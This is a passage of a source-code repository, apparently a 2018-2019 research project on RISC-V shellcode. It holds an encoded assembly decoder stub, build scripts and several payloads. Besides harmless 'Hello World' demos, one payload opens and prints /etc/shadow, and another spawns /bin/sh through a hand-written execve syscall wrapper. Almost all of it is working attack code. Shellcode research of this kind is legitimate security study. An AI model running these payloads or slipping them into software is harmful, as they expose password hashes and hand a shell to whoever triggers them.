 83 | .endm
 84 |     init_block
 85 |     # Loading fenci
 86 |     lui     a0,0x412f3
 87 |     li      s4,18
 88 |     sra     t1,a0,s4
 89 |     addiw   t1,t1,-20
 90 |     addiw   t1,t1,-20
 91 |     addiw   t1,t1,-20
 92 |     amoor.w.aq t5,t1,(sp)
 93 |     next_block
 94 |     init_block
 95 |     # Loading 0x777d
 96 |     lui a0,0x57783
 97 |     li  s4,12
 98 |     sra t1,a0,s4
 99 |     addiw   t1,t1,-6
100 |     amoor.w.aq t5,t1,(sp)
101 |     next_block
102 |     init_block
103 |     # Loading 0x970a
104 |     lui a0,0x59714
105 |     li  s4,12
106 |     sra t1,a0,s4
107 |     addiw   t1,t1,-10
108 |     amoor.w.aq t5,t1,(sp)
109 |     next_block
110 |     init_block
111 |     # Loading 0x45c1
112 |     lui a0,0x51704
113 |     li  s4,14
114 |     sra s4,a0,s4
115 |     amoor.w    t5,s4,(sp)
116 |     next_block
117 |     init_block
118 |     # Loading 0x59a
119 |     lui a0,0x41673
120 |     li  s4,14
121 |     sra t1,a0,s4
122 |     addiw   t1,t1,-2
123 |     amoor.w.aq t5,t1,(sp)
124 |     next_block
125 |     init_block
126 |     # Loading 0x853a
127 |     lui a0,0x58544
128 |     li  s4,12
129 |     sra t1,a0,s4
130 |     addiw   t1,t1,-10
131 |     amoor.w.aq t5,t1,(sp)
132 |     next_block
133 |     init_block
134 |     # Loading 0x86ba
135 |     lui a0,0x586c4
136 |     li  s4,12
137 |     sra t1,a0,s4
138 |     addiw   t1,t1,-10
139 |     amoor.w.aq t5,t1,(sp)
140 |     next_block
141 |     init_block
142 |     # Loading 0x4140
143 |     lui a0,0x50503
144 |     li  s4,14
145 |     sra s4,a0,s4
146 |     amoor.w    t5,s4,(sp)
147 |     next_block
148 |     init_block
149 |     # Loading 0x87a2
150 |     lui t5,0x587a2
151 |     li  s2,12
152 |     sra s4,t5,s2
153 |     amoor.w    t5,s4,(sp)
154 |     next_block
155 |     init_block
156 |     # Loading 0x8391
157 |     lui a0,0x30723
158 |     li  s4,13
159 |     sra s4,a0,s4
160 |     amoor.w    t5,s4,(sp)
161 |     next_block
162 |     init_block
163 |     # Loading 0x509
164 |     lui a0,0x41424
165 |     li  s4,14
166 |     sra s4,a0,s4
167 |     amoor.w    t5,s4,(sp)
168 |     next_block
169 |     init_block
170 |     # Loading 0x8c3d
171 |     lui t5,0x2f462
172 |     li  s2,12
173 |     addiw   s2,s2,-5
174 |     sra t1,t5,s2
175 |     addiw   t1,t1,-3
176 |     amoor.w.aq t5,t1,(sp)
177 |     next_block
178 |     init_block
179 |     # Loading 0xc300
180 |     lui a0,0x38614
181 |     li  s4,13
182 |     sra t1,a0,s4
183 |     addiw   t1,t1,-10
184 |     amoor.w.aq t5,t1,(sp)
185 |     next_block
186 |     init_block
187 |     # Loading 0x705
188 |     lui a0,0x50705
189 |     li  s4,12
190 |     sra s4,a0,s4
191 |     amoor.w    t5,s4,(sp)
192 |     next_block
193 |     init_block
194 |     # Loading 0x15f9
195 |     lui a0,0x51613
196 |     li  s4,12
197 |     sra t1,a0,s4
198 |     addiw   t1,t1,-10
199 |     addiw   t1,t1,-16
200 |     amoor.w.aq t5,t1,(sp)
201 |     next_block
202 |     init_block
203 |     # Loading 0xf1c1
204 |     lui t5,0x2f2f2
205 |     li  s2,12
206 |     addiw   s2,s2,-8
207 |     sra t1,t5,s2
208 |     addiw   t1,t1,-10
209 |     addiw   t1,t1,-13
210 |     addiw   t1,t1,-20
211 |     addiw   t1,t1,-20
212 |     amoor.w.aq t5,t1,(sp)
213 |     next_block
214 |     init_block
215 |     # Loading fenci
216 |     lui     a0,0x412f3
217 |     li      s4,18
218 |     sra     t1,a0,s4
219 |     addiw   t1,t1,-20
220 |     addiw   t1,t1,-20
221 |     addiw   t1,t1,-20
222 |     amoor.w.aq t5,t1,(sp)
223 |     next_block
224 |     init_block
225 |     # Loading 0x9682
226 |     lui t5,0x39682
227 |     li  s2,12
228 |     sra s4,t5,s2
229 |     amoor.w    t5,s4,(sp)
230 |     next_block
231 | step5:
232 |     end_nopsled
233 | step6:
234 |     csrc mip,sp
235 | 


--------------------------------------------------------------------------------
/hifiveu/tick.S:
--------------------------------------------------------------------------------
  1 | /*#
  2 |  *# (c) 2018-2019 Hadrien Barral
  3 |  *# SPDX-License-Identifier: Apache-2.0
  4 |  */
  5 | 
  6 | .global shellcode
  7 | shellcode:
  8 | 
  9 | .macro dangerous_nop2
 10 |     li t1,-2
 11 | .endm
 12 | .macro xp_fixup
 13 |     # n464:5 n448:15
 14 |     addi sp, sp, 464
 15 |     addi sp, sp, 464
 16 |     addi sp, sp, 464
 17 |     addi sp, sp, 464
 18 |     addi sp, sp, 464
 19 |     addi sp, sp, 448
 20 |     addi sp, sp, 448
 21 |     addi sp, sp, 448
 22 |     addi sp, sp, 448
 23 |     addi sp, sp, 448
 24 |     addi sp, sp, 448
 25 |     addi sp, sp, 448
 26 |     addi sp, sp, 448
 27 |     addi sp, sp, 448
 28 |     addi sp, sp, 448
 29 |     addi sp, sp, 448
 30 |     addi sp, sp, 448
 31 |     addi sp, sp, 448
 32 |     addi sp, sp, 448
 33 |     addi sp, sp, 448
 34 | .endm
 35 | .macro end_nopsled
 36 |     # len:0
 37 | .endm
 38 | step0:
 39 |     .word 0x2730276F
 40 | stage2_pool:
 41 |     .8byte 0x4242424242424242
 42 |     .8byte 0x4242424242424242
 43 |     .8byte 0x4242424242424242
 44 |     .8byte 0x4242424242424242
 45 |     .8byte 0x4242424242424242
 46 |     .8byte 0x4242424242424242
 47 |     .8byte 0x4261447a6f314233 # 48 # ADD_3A
 48 |     .8byte 0x42627073717a5a42 # 56 # ADD_1B
 49 |     .8byte 0x4242424242424242
 50 |     .8byte 0x4242424242424242
 51 |     .8byte 0x4261706e69633436 # 80 # ADD_2A
 52 |     .8byte 0x4242424242424242
 53 |     .8byte 0x4242424242424242
 54 |     .8byte 0x4261447a31356775 # 104 # ADD_3B
 55 |     .8byte 0x413166346e514956 # 112 # MUL_2
 56 |     .8byte 0x426132356a4b6e31 # 120 # ADD_2B
 57 |     .8byte 0x4242424242424242
 58 |     .8byte 0x4242424242424242
 59 |     .8byte 0x4242424242424242
 60 |     .8byte 0x4242424242424242
 61 |     .8byte 0x4131706f64596870 # 160 # MUL_4
 62 |     .8byte 0x4261336f596c5239 # 168 # ADD_4A
 63 |     .8byte 0x4131352778497450 # 176 # MUL_3
 64 |     .8byte 0x4131567a47714b4d # 184 # MUL_1
 65 |     .8byte 0x4242424242424242
 66 |     .8byte 0x4242424242424242
 67 |     .8byte 0x4242424242424242
 68 |     .8byte 0x4242424242424242
 69 |     .8byte 0x4242424242424242
 70 |     .8byte 0x4242424242424242
 71 |     .8byte 0x4131555555555555 # 240 # FIX
 72 |     .8byte 0x426358466535524c # 248 # ADD_1A
 73 | payload_pool:
 74 |     .include PAYLOAD_FILE
 75 | step1:
 76 |     sra s4, zero, s3
 77 |     sra sp, a4, s4
 78 | step2:
 79 |                      #Role [Can]
 80 |     fld fa0, 48(sp)  #ADD_3A [AM]
 81 |     fld fa2, 56(sp)  #ADD_1B [AM]
 82 |     fld fa4, 80(sp)  #ADD_2A [AM]
 83 |     fld fa6, 112(sp) #MUL_2 [ M]
 84 |     fld fs0, 120(sp) #ADD_2B [AM]
 85 |     fld fs2, 176(sp) #MUL_3 [ M]
 86 |     fld ft2, 184(sp) #MUL_1 [ M]
 87 |     fld ft4, 240(sp) #FIX [ M]
 88 |     fld ft6, 248(sp) #ADD_1A [AM]
 89 | step3:
 90 |     xp_fixup
 91 | step4:
 92 | .macro next_block
 93 |     .short 0x6141
 94 | .endm
 95 | .macro fblock op, dstr, mulr, addr, store_offset, round=rup
 96 |     fm\op\().d \dstr, \mulr, ft4, \addr, \round
 97 |     fsd \dstr, \store_offset(sp)
 98 | .endm
 99 |     fblock add, ft6, ft2, ft6, 1952
100 |     fblock add, ft6, ft2, fa2, 1958
101 |     fblock sub, ft6, fa6, fa4, 1964
102 |     fblock sub, ft6, fa6, fs0, 1970
103 |     next_block
104 |     fld fa2, 104(a4) #ADD_3B [AM]
105 |     fld fa4, 160(a4) #MUL_4 [AM]
106 |     fld fa1, 168(a4) #ADD_4A [A ]
107 |     fblock sub, ft6, fs2, fa0, 1960
108 |     fblock sub, ft6, fs2, fa2, 1966
109 |     fblock sub, ft6, fa4, fa1, 1970
110 | step5:
111 |     end_nopsled
112 | step6:
113 |     csrc mip,sp
114 | 


--------------------------------------------------------------------------------
/payload/README.txt:
--------------------------------------------------------------------------------
1 | This folder contains the various 'Hello World' payload:
2 |  - For the QEMU demos ('serial')
3 |  - for the Hifive U demos ('hifiveu')


--------------------------------------------------------------------------------
/payload/payload.mk:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | # $1: payload name
 7 | # $2: stack address
 8 | # $3: out file
 9 | define build_payload =
10 | payload_BASE:=$(shell dirname $(lastword $(MAKEFILE_LIST)))
11 | payload_PAYD := $1
12 | payload_BUILD := $(BUILD)/$$(payload_PAYD)
13 | payload_ABI := rv64ic
14 | payload_GCCFLAGS := -march=$$(payload_ABI) -mabi=lp64 -Os -Wall -Wextra -Werror -pipe -nostdlib -nostartfiles -ffreestanding -fPIC -std=c11
15 | payload_ASFLAGS := -march=$$(payload_ABI) --warn
16 | 
17 | $$(payload_BUILD):
18 | 	$(Q)mkdir -p $$@
19 | 
20 | $$(payload_BUILD)/$$(payload_PAYD).c.o: $$(payload_BASE)/$$(payload_PAYD).c | $$(payload_BUILD)
21 | 	$(Q)$(GCC) $$(payload_GCCFLAGS) -o $$@ -c $$<
22 | 
23 | $$(payload_BUILD)/$$(payload_PAYD).S.i: $$(payload_BASE)/$$(payload_PAYD).S | $$(payload_BUILD)
24 | 	$(Q)$(GCC) -DPAYLOAD_STACK=$2 -o $$@ -P -E $$<
25 | 
26 | $$(payload_BUILD)/$$(payload_PAYD).S.o: $$(payload_BUILD)/$$(payload_PAYD).S.i
27 | 	$(Q)$(AS)  $$(payload_ASFLAGS) -o $$@ $$<
28 | 
29 | $$(payload_BUILD)/$$(payload_PAYD).elf: $$(payload_BASE)/$$(payload_PAYD).ld $$(payload_BUILD)/$$(payload_PAYD).c.o $$(payload_BUILD)/$$(payload_PAYD).S.o
30 | 	$(Q)$(LD)  $(LDFLAGS) -T $$< -o $$@ $(filter-out $$<,$$^)
31 | 
32 | $$(payload_BUILD)/$$(payload_PAYD).bin: $$(payload_BUILD)/$$(payload_PAYD).elf
33 | 	$(Q)$(OBJCOPY) -O binary $$< $$@
34 | 
35 | $3: $$(payload_BUILD)/$$(payload_PAYD).bin
36 | 	$(Q)cp $$< $$@
37 | endef


--------------------------------------------------------------------------------
/payload/payload_linux_etc_shadow.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | .section .start
 7 | _start:
 8 |     .globl _start
 9 |     nop
10 |     nop
11 | 
12 |     # Get a stack
13 |     jal sp, next
14 | next:
15 |     addi sp, sp, -32
16 | 
17 |     jal main
18 |     li a7, 93
19 |     ecall
20 | 


--------------------------------------------------------------------------------
/payload/payload_linux_etc_shadow.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #include <stddef.h>
 7 | #include <sys/types.h>
 8 | 
 9 | #include "payload_linux_shared.c"
10 | 
11 | /* We use this define to overcome linker limitations */
12 | #define WIN_STRING "Hello from shellcode, I will now display /etc/shadow ...\n"
13 | 
14 | int main(void)
15 | {
16 |     sys_write(1 /* stdout */, WIN_STRING, sizeof(WIN_STRING)-1);
17 | 
18 |     char buf[2000];
19 |     int fd = sys_openat(0 /* ignored */, "/etc/shadow", 0 /* O_RDONLY */);
20 |     ssize_t read_size = sys_read(fd, buf, sizeof(buf));
21 |     sys_write(1 /* stdout */, buf, read_size);
22 |     
23 |     return 0;
24 | }
25 | 


--------------------------------------------------------------------------------
/payload/payload_linux_etc_shadow.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0;
11 |     .text . : { *(.start) *(.text*) *(.rodata*) }
12 |     .data : { *(.data*) }
13 |     .bss : { *(.bss*) }
14 | }
15 | 


--------------------------------------------------------------------------------
/payload/payload_linux_hello.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | .section .start
 7 | _start:
 8 |     .globl _start
 9 |     nop
10 |     nop
11 | 
12 |     # Get a stack
13 |     jal sp, next
14 | next:
15 |     addi sp, sp, -32
16 | 
17 |     li sp, PAYLOAD_STACK
18 |     jal main
19 |     li a7, 93
20 |     ecall
21 | 


--------------------------------------------------------------------------------
/payload/payload_linux_hello.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #include <stddef.h>
 7 | 
 8 | #include "payload_linux_shared.c"
 9 | 
10 | /* We use this define to overcome linker limitations */
11 | #define WIN_STRING "Hello, world from shellcode!\n"
12 | 
13 | int main(void)
14 | {
15 |     sys_write(1 /* stdout */, WIN_STRING, sizeof(WIN_STRING)-1);
16 |     return 0;
17 | }
18 | 


--------------------------------------------------------------------------------
/payload/payload_linux_hello.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0;
11 |     .text . : { *(.start) *(.text*) *(.rodata*) }
12 |     .data : { *(.data*) }
13 |     .bss : { *(.bss*) }
14 | }
15 | 


--------------------------------------------------------------------------------
/payload/payload_linux_shared.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #include <stddef.h>
 7 | #include <sys/types.h>
 8 | 
 9 | __attribute__((unused))
10 | static int sys_openat(int dirfd, const char *pathname, int flags)
11 | {
12 |     register int          a0  __asm__ ("a0") = dirfd;
13 |     register const char * a1  __asm__ ("a1") = pathname;
14 |     register int          a2  __asm__ ("a2") = flags;
15 |     register int          ret __asm__ ("a0");
16 |     __asm__ volatile(
17 |         "li a7, 56\n"
18 |         "ecall\n"
19 |         : "=r" (ret)
20 |         : "r" (a0), "r" (a1),  "r" (a2)
21 |         : "a7"
22 |     );
23 |     
24 |     return ret;
25 | }
26 | 
27 | __attribute__((unused))
28 | static ssize_t sys_read(int fd, const char *buf, size_t count)
29 | {
30 |     register int          a0  __asm__ ("a0") = fd;
31 |     register const char * a1  __asm__ ("a1") = buf;
32 |     register size_t       a2  __asm__ ("a2") = count;
33 |     register ssize_t      ret __asm__ ("a0");
34 |     __asm__ volatile(
35 |         "li a7, 63\n"
36 |         "ecall\n"
37 |         : "=r" (ret)
38 |         : "r" (a0), "r" (a1),  "r" (a2)
39 |         : "a7"
40 |     );
41 |     
42 |     return ret;
43 | }
44 | 
45 | __attribute__((unused))
46 | static ssize_t sys_write(int fd, const char *buf, size_t count)
47 | {
48 |     register int          a0  __asm__ ("a0") = fd;
49 |     register const char * a1  __asm__ ("a1") = buf;
50 |     register size_t       a2  __asm__ ("a2") = count;
51 |     register ssize_t      ret __asm__ ("a0");
52 |     __asm__ volatile(
53 |         "li a7, 64\n"
54 |         "ecall\n"
55 |         : "=r" (ret)
56 |         : "r" (a0), "r" (a1),  "r" (a2)
57 |         : "a7"
58 |     );
59 |     
60 |     return ret;
61 | }
62 | 
63 | __attribute__((unused))
64 | static int sys_execve(const char *filename, const char** argv, const char** envp)
65 | {
66 |     register const char *  a0  __asm__ ("a0") = filename;
67 |     register const char ** a1  __asm__ ("a1") = argv;
68 |     register const char ** a2  __asm__ ("a2") = envp;
69 |     register int           ret __asm__ ("a0");
70 |     __asm__ volatile(
71 |         "li a7, 221\n"
72 |         "ecall\n"
73 |         : "=r" (ret)
74 |         : "r" (a0), "r" (a1),  "r" (a2)
75 |         : "a7"
76 |     );
77 |     
78 |     return ret;
79 | }
80 | 


--------------------------------------------------------------------------------
/payload/payload_linux_shell.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | .section .start
 7 | _start:
 8 |     .globl _start
 9 |     nop
10 |     nop
11 | 
12 |     # Get a stack
13 |     jal sp, next
14 | next:
15 |     addi sp, sp, -32
16 | 
17 |     li sp, PAYLOAD_STACK
18 |     jal main
19 |     li a7, 93
20 |     ecall
21 | 


--------------------------------------------------------------------------------
/payload/payload_linux_shell.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #include <stddef.h>
 7 | 
 8 | #include "payload_linux_shared.c"
 9 | 
10 | /* We use this define to overcome linker limitations */
11 | #define WIN_STRING "Hello from shellcode, I will now spawn a shell...\n"
12 | 
13 | int main(void)
14 | {
15 |     sys_write(1 /* stdout */, WIN_STRING, sizeof(WIN_STRING)-1);
16 |     sys_execve("/bin/sh", NULL, NULL);
17 | 
18 |     #define ERR_STRING "Failed to spawn shell\n"
19 |     sys_write(1 /* stdout */, ERR_STRING, sizeof(ERR_STRING)-1);
20 |     return 0;
21 | }
22 | 


--------------------------------------------------------------------------------
/payload/payload_linux_shell.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0;
11 |     .text . : { *(.start) *(.text*) *(.rodata*) }
12 |     .data : { *(.data*) }
13 |     .bss : { *(.bss*) }
14 | }
15 | 


--------------------------------------------------------------------------------
/payload/payload_serial.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | .section .start
 7 | _start:
 8 |     .globl _start
 9 |     li sp, PAYLOAD_STACK
10 |     jal main
11 |     j .
12 | 


--------------------------------------------------------------------------------
/payload/payload_serial.c:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | #define SERIAL_BASE 0x10013000U
 7 | #define SERIAL_FLAG_OFFSET 0x18
 8 | #define SERIAL_BUFFER_FULL (1 << 5)
 9 | 
10 | static void x_putc(char c)
11 | {
12 | #if 0
13 |     while (*(volatile unsigned long*)(SERIAL_BASE + SERIAL_FLAG_OFFSET)
14 |                                      & (SERIAL_BUFFER_FULL));
15 | #endif
16 |     *(volatile unsigned*)SERIAL_BASE = c;
17 | #if 0
18 |     if (c == '\n') x_putc('\r');
19 | #endif
20 | }
21 | 
22 | static void x_puts(const char *s)
23 | {
24 |     do {
25 |         x_putc(*s);
26 |     } while(*++s);
27 | }
28 | 
29 | int main(void)
30 | {
31 |     x_puts("Hello, world!\n");
32 |     return 0;
33 | }
34 | 


--------------------------------------------------------------------------------
/payload/payload_serial.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0;
11 |     .text . : { *(.start) *(.text*) *(.rodata*) }
12 |     .data : { *(.data*) }
13 |     .bss : { *(.bss*) }
14 | }
15 | 


--------------------------------------------------------------------------------
/scripts/common.m4:
--------------------------------------------------------------------------------
 1 | divert(-1)
 2 | /*
 3 |  * (c) 2018-2019 Hadrien Barral
 4 |  * SPDX-License-Identifier: Apache-2.0
 5 |  */
 6 | changequote({,})
 7 | define({LQ},{changequote(`,'){dnl}
 8 | changequote({,})})
 9 | define({RQ},{changequote(`,')dnl{
10 | }changequote({,})})
11 | changecom({;})
12 | 
13 | define({repeat}, {ifelse($1, 0, {}, $1, 1, {$2}, {$2
14 |         repeat(eval($1-1), {$2})})})
15 | divert(0)dnl


--------------------------------------------------------------------------------
/scripts/common.mk:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | MAKEFLAGS += --no-builtin-rules
 7 | SHELL     := /bin/bash -o pipefail
 8 | Q         := 
 9 | PREFIX    := riscv64-unknown-elf-
10 | AS        := $(PREFIX)as
11 | GCC       := $(PREFIX)gcc
12 | LD        := $(PREFIX)ld
13 | OBJCOPY   := $(PREFIX)objcopy
14 | OBJDUMP   := $(PREFIX)objdump
15 | ASFLAGS   := -march=$(RV_ABI)
16 | LDFLAGS   := -nostdlib -nostartfiles -static
17 | BUILD     := build
18 | 


--------------------------------------------------------------------------------